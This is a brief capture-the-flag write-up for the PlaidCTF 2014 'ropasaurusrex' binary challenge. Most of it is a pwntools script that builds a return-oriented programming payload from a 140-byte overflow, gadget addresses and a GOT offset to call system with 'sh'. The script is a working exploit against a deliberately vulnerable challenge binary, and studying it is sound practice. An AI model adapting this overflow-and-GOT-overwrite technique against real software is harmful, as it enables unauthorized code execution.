Ropasaurusrex (plaidctf-2014)

This is one of the best binary problem that i have solved. This problem i have solved 1 year back but i forgot to update.

This problem is completely based on ASLR bypassing, where we are supposed to overwrite GOT table.

As many writeup’s are there to explain this same problem i am not planning to give the entire description of the exploit.

from pwn import *

# Run the file (cat inp /dev/stdin)|./ropasaurusrex as the childprocess is being spawned

#got_libc_start_main = 0x8049618

#__libc_start_main = 0xf7e22990
#system = 0xf7e49190

#0x080484b5: pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
#0x080483bb: xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ; ret  ;  (1 found)

#value to ebx :aaa99154

#address of "sh" : 0x804867f

payload = ''

payload += "A"*140 #offset to reach eip
payload += p32(0x080484b5)
payload += p32(0xaaa99154)
payload += p32(0x268f8)
payload += p32(0xdeedbeef)
payload += p32(0xcafebabe)
payload += p32(0x080483bb)
payload += p32(0x0804835c)
payload += p32(0x0804867f)

print payload